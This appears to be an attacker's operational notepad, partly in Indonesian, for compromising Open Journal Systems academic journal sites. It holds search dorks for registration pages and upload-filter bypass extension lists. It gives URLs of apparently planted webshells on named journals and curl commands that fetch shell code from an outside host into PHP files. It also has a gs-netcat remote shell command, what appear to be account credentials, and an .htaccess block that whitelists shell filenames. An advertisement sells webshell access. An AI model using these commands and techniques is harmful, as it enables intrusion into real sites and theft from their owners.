"" inurl:index.php/index/user/register inurl:ac.id -inurl:.in

pages/user/index.php



Cari Dari Sini

https://scholar.google.com/

ojs_files
presses
public_files
uploads
ojsdata
fileses22
data
datajurnal
file
ojsfiles
storage
journalfiles
artikeljurnal


kalo dari domain ini cincader.org, bisa sebutkan subdomain apa saja yg digunakan ojs/pkp dan terdaftar di google

files/contexts/1/submissions/1
files/contexts/1/library/
https://journals.udom.ac.tz/files/journals/6/articles/823/67b2d8977b9d0.shtml
https://journals.udom.ac.tz/files/contexts/6/library/about-OTH.phps
https://www.ijdesign.org/files/journals/1/articles/1211/submission/original/6259-17459-2-SM.jpg
https://www.ijosi.org/files/journals/1/articles/1796/submission/1796-12-9786-2-2-20250313.shtml
https://www.indonesianjournalofcancer.or.id/files/journals/1/articles/1456/submission/original/1456-6120-2-SM.jpg

---------------------------------------------------------------------------------------------------------------

intitle:illness inurl:index.php "article" -site:.ac.id -site:.go.id -site:.ru -site:.or.id -site:journalcjast.com -site:journaljerr.com -site:journalajpas.com -site:journaljeai.com -site:journaljsrr.com -site:journalajarr.com -site:journalajrid.com -site:journaljgeesi.com -site:journaljpri.com -site:journalijecc.com -site:journalijpss.com -site:journalindj.com -site:journalajcrmh.com -site:journalmrji.com -site:he02.tci-thaijo.org -site:journaljammr.com -site:journaljamps.com -site:journalajmah.com -site:journalaji.com -site:journalca.com -site:journalijtdh.com -site:journalijrrgy.com -site:journalca.com -site:journalajcrs.com -site:journalajpr.com -site:journalaji.com -site:journalor.com -site:journaljocamr.com -site:journalarrb.com -site:journalajrre.com -site:journalajorrin.com -site:journalajrru.com -site:journalahrj.com -site:journalejmp.com -site:journalaprj.com -site:journalair.com -site:journalajpcb.com -site:journaljalsi.com -site:journalasrj.com -site:journalajrrop.com -site:journalajrs.com -site:journalajrimps.com -site:journalajrn.com -site:journalair.com -site:journalajcr.com -site:journalsajp.com -site:journalijrrd.com -site:journaljcti.com -site:journalajopacs.com -site:journalijbcrr.com -site:journalajr2p.com -site:.journalajravs.com -site:revfono.uchile.cl -site:journals.bilpubgroup.com -site:journalajl2c.com -site:journalirjpac.com -site:journalajravs.com

"hajj" inurl:wp-content site:id -site:.go.id -site:.ac.id -site:.sch.id

https://garuda.kemdikbud.go.id/
https://index.pkp.sfu.ca/
https://doaj.org/search/journals?ref=homepage


ojs_files
presses,
public_files,
uploads,
ojsdata,
fileses22,
data,
datajurnal
,file
,ojsfiles
,artikeljurnal

--------------------------------------------------------------------------------------------------------------------------------------------

php3|Php3|pHp3|phP3|PHp3|pHP3|PhP3|PHP3|PhP3
php4|Php4|pHp4|phP4|PHp4|pHP4|PhP4|PHP4|PhP4
php71|php72|php73|php74|php80|php81|php82|php83
php99|Php99|php999
php.tar|php.tar.gz|php.tgz
php.rar|php.7z|php.iso|php.dmg
php.js|php.css|php.html|php.htm
php.exe|php.com|php.sh|php.bash|php.pl|php.py
php.jsp|php.rb|php.cfm
php.class|php.war|php.jar
php.tmp|php.swf
php.config|php.ini
php.inc|php.old|php.save
php.log|php.cache|php.session|php.dat

phps|Phps|pHps|phPs|phPS|PHps|PhPs|PHPS
phtml1|phtml2|phtml3

perl5|perl6|perl7|perl.txt|perl.exe
py3|py3.8|py3.9|py310|py311|py312|py.exe|py.txt
exe1|exe2|exe.old|exe.bak|exe.tmp|exe.jpg|exe.png

phar1|phar2|phar3|phar.old|phar.tmp|phar.jpg|phar.php
shtml1|shtml2|shtml.old|shtml.tmp

asp1|asp2|asp3|asp.old|asp.tmp
aspx1|aspx2|aspx.old|aspx.tmp

pht|phtm|phtm1|phtm2

php.avi|php.mkv|php.mov|php.mp4|php.mp3|php.wav

php.csv|php.json|php.xml|php.yaml|php.yml

php.md|php.rtf|php.odt

php.bat|php.cmd|php.ps1|php.vbs|php.ws|php.reg

php.exe.jpg|php.exe.png|php.pdf.exe|php.txt.exe








https://www.hospitalchronicles.gr/index.php/hchr/submission/wizard/2?submissionId=970#step-2


https://journal.eu-jr.eu/engineering/submission/wizard/2?submissionId=3721#step-2

https://journal.eu-jr.eu/files/journals/1



https://journal.scimadly.com/files/contexts/6/library/ladev-OTH.php

https://journal.forikami.com/files/contexts/1/library/index-OTH.php
http://pjosr.com/files/contexts/1/library/SSI-OTH.shtml

https://journal.forikami.com/files/journals/1/articles/856/67b9a7e2ac8a7.shtml

"kata" intext:register inurl:user/register site:. -ac.id "journal"



ojsfiles
ojsdata
data
datajournals
journals
files


inurl:index.php/index/user/register inurl:ac.id -inurl:.in
intitle:health inurl:index.php "article"

https://iasjournals.org/files/contexts/1/library/SSI-OTH.shtml

https://openscienceinitiative.org/files/contexts/1/articles/32/67d26329d430d.shtml?%20ls

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Need !!!! WTB!!!

Proyek jelas, yang tipu2 minggir!!!

Jasa Sewa KW (Harga Japri)

Jasa Setor Webshell Traffic
 - gsc aman 
 - high da
 - garansi ada 
 - all green 
 - terminal on

Jasa Backlink ac.id, go.id, gov,edu (bertraffic)

Dibutuhkan segera, ready? japri bos!
---------------------------------------------------------------------

Geography; Environmental management; Human geography; health

Biology
Chemistry
Engineering & Technologies
Humanities & Social Sciences
Mathematics & Physics



https://pjmil.pamil.org.ph/files/contexts/3/articles/51/67cd2a996d2d8.shtm



/home/techxluy/jilpublishers.com/
?dir=%2Fhome%2Ftechxluy%2F

curl -Ls adumekanik.xyz/shell/ladev.txt | tee -a log.php
curl -Ls adumekanik.xyz/shell/ibs.txt | tee -a about.php

ancua7490@gmail.com
lanciau284@gmail.com
Star88Star

Your ORCID iD: 0009-0002-1763-2998
http://orcid.org/0009-0002-1763-2998


files
journals
data

elearning

files/journals/1/articles/3/file,,,, ( bisa liat dari inspect)


files/contexts/1/library

library/contexs




"Technology" inurl:index.php/index/user/register site:.edu OR site:.gov OR site:.org OR site:.com OR site:.net OR site:.mil OR site:.int OR site:.us OR site:.uk OR site:.ca OR site:.au OR site:.za OR site:.fr OR site:.de OR site:.es OR site:.it OR site:.nl OR site:.ru OR site:.cn OR site:.jp OR site:.kr OR site:.in OR site:.id OR site:.sg OR site:.my OR site:.ph OR site:.th OR site:.vn OR site:.bd OR site:.pk OR site:.eg OR site:.sa OR site:.ae OR site:.tr OR site:.ng OR site:.ke OR site:.br OR site:.mx OR site:.ar OR site:.cl OR site:.pe OR site:.co OR site:.ve OR site:.bo OR site:.uy OR site:.py OR site:.do OR site:.cu OR site:.hk OR site:.tw OR site:.lk OR site:.np OR site:.mm OR site:.kh OR site:.la OR site:.mn OR site:.kz OR site:.uz OR site:.tj OR site:.tm OR site:.kg OR site:.az OR site:.ge OR site:.am OR site:.by OR site:.md OR site:.ua OR site:.pl OR site:.cz OR site:.sk OR site:.hu OR site:.ro OR site:.bg OR site:.rs OR site:.si OR site:.hr OR site:.ba OR site:.me OR site:.al OR site:.mk OR site:.xk OR site:.gr OR site:.cy OR site:.mt OR site:.is OR site:.no OR site:.se OR site:.fi OR site:.dk OR site:.ee OR site:.lv OR site:.lt OR site:.ch OR site:.li OR site:.at OR site:.be OR site:.lu OR site:.ie OR site:.pt OR site:.nz OR site:.fj OR site:.pg OR site:.sb OR site:.vu OR site:.ws OR site:.tv OR site:.tk OR site:.fm OR site:.pw OR site:.nr OR site:.ki OR site:.to OR site:.cc OR site:.io OR site:.sh OR site:.ac OR site:.re OR site:.yt OR site:.tf OR site:.pm OR site:.gp OR site:.mq OR site:.bl OR site:.mf OR site:.wf OR site:.nc OR site:.pf OR site:.pn


"Technology" inurl:index.php/index/user/register 
site:.edu OR site:.gov OR site:.mil OR site:.ac OR site:.go OR site:.sch OR site:.org OR site:.com OR site:.net OR site:.int OR site:.us OR site:.uk OR site:.ca OR site:.au OR site:.za OR site:.fr OR site:.de OR site:.a OR site:.it OR site:.nl OR site:.ru OR site:.cn OR site:.jp OR site:.kr OR site:.in OR site:.id OR site:.sg OR site:.my OR site:.ph OR site:.th OR site:.vn OR site:.bd OR site:.pk OR site:.eg OR site:.sa OR site:.ae OR site:.tr OR site:.ng OR site:.ke OR site:.br OR site:.mx OR site:.ar OR site:.cl OR site:.pe OR site:.co OR site:.ve OR site:.bo OR site:.uy OR site:.py OR site:.do OR site:.cu OR site:.hk OR site:.tw OR site:.lk OR site:.np OR site:.mm OR site:.kh OR site:.la OR site:.mn OR site:.kz OR site:.uz OR site:.tj OR site:.tm OR site:.kg OR site:.az OR site:.ge OR site:.am OR site:.by OR site:.md OR site:.ua OR site:.pl OR site:.cz OR site:.sk OR site:.hu OR site:.ro OR site:.bg OR site:.rs OR site:.si OR site:.hr OR site:.ba OR site:.me OR site:.al OR site:.mk OR site:.xk OR site:.gr OR site:.cy OR site:.mt OR site:.is OR site:.no OR site:.se OR site:.fi OR site:.dk OR site:.ee OR site:.lv OR site:.lt OR site:.ch OR site:.li OR site:.at OR site:.be OR site:.lu OR site:.ie OR site:.pt OR site:.nz OR site:.fj OR site:.pg OR site:.sb OR site:.vu OR site:.ws OR site:.tv OR site:.tk OR site:.fm OR site:.pw OR site:.nr OR site:.ki OR site:.to OR site:.cc OR site:.io OR site:.sh OR site:.ac OR site:.re OR site:.yt OR site:.tf OR site:.pm OR site:.gp OR site:.mq OR site:.bl OR site:.mf OR site:.wf OR site:.nc OR site:.pf OR site:.pn



gs-netcat -s "5HkpEFzzahqfBtQEpPBTV9" -i


https://www.stmedj.com/.github/workflows/
https://www.stmedj.com/ibs.php
https://www.stmedj.com/files/contexts/1/library/index.php
https://www.stmedj.com/files/journals/1/articles/19/errorlog.php
https://www.stmedj.com/files/journals/1/articles/72/ladev.php
https://www.stmedj.com/files/journals/1/articles/10/gampangaja.php
https://www.stmedj.com/files/journals/1/articles/37/1289128912.jpg
https://www.stmedj.com/files/journals/1/articles/54/ac.php
https://www.stmedj.com/files/journals/notfound.php
https://www.stmedj.com/files/journals/1/articles/37/error_log.php
https://www.stmedj.com/templates/management/indosec.php
https://www.stmedj.com/public/journals/1/
https://www.stmedj.com/plugins/importexport/pubmed/locale/sl_SI/shujifine.php

?dir=%2Fvar%2Fwww%2Fhtml%2Fwww

stmedj.com/classes/getout.php/?dir=%2Fvar%2Fwww%2Fvhosts%2Fstmedj.com


ibs-OTH.php


find /home/741581.cloudwaysapps.com/kkgsbxdvxb/public_html/files/ -type f -exec chmod 644 {} \;

~~~~~~~~~~~~~~~~~~~~~~~~

find /home/741581.cloudwaysapps.com/kkgsbxdvxb/public_html/files/ -type d -exec chmod 755 {} \;



zip -r Full_backup1.zip (seluruh nama folder)


<Files *.ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.Ph*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.pH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.PH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.sh*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.Sh*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.sH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.SH*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.AS*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.As*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.aS*>
    Order Deny,Allow
    Deny from all
</Files>
<Files *.as*>
    Order Deny,Allow
    Deny from all
</Files>
<Files "index*.php">
    Allow from all
</Files>
<FilesMatch "\.(jpg|jpeg|png|gif|bmp|ico)$">
    Order Deny,Allow
    Allow from all
</FilesMatch>
<FilesMatch "\.(mp4|avi|mov|wmv|mp3|wav|ogg)$">
    Order Deny,Allow
    Allow from all
</FilesMatch>
<FilesMatch "\.(pdf|doc|docx|xls|xlsx|zip|rar|tar|gz|ppt|pptx|csv|)$">
    Order Deny,Allow
    Allow from all
</FilesMatch>
<FilesMatch "^(3-MAR.shtml|4-MAR.shtml|22-MAR.php|3-MAR.php|4-MAR.php|5-MAR.php|6-MAR.php|11-MAR.php|1-MAR.shtml|babik.php|2-MAR.shtml|33-MAR.php|66ce785302a6f.shtml)$">
        Order Deny,Allow
    Allow from all
    </FilesMatch>
Options -Indexes



find  /var/www/html/files/ -type f -exec chmod 444 {} \;

~~~~~~~~~~~~~~~~~~~~~~~~

find /var/www/html/files/ -type d -exec chmod 555 {} \;



-----------------------------------------------------------------------------------

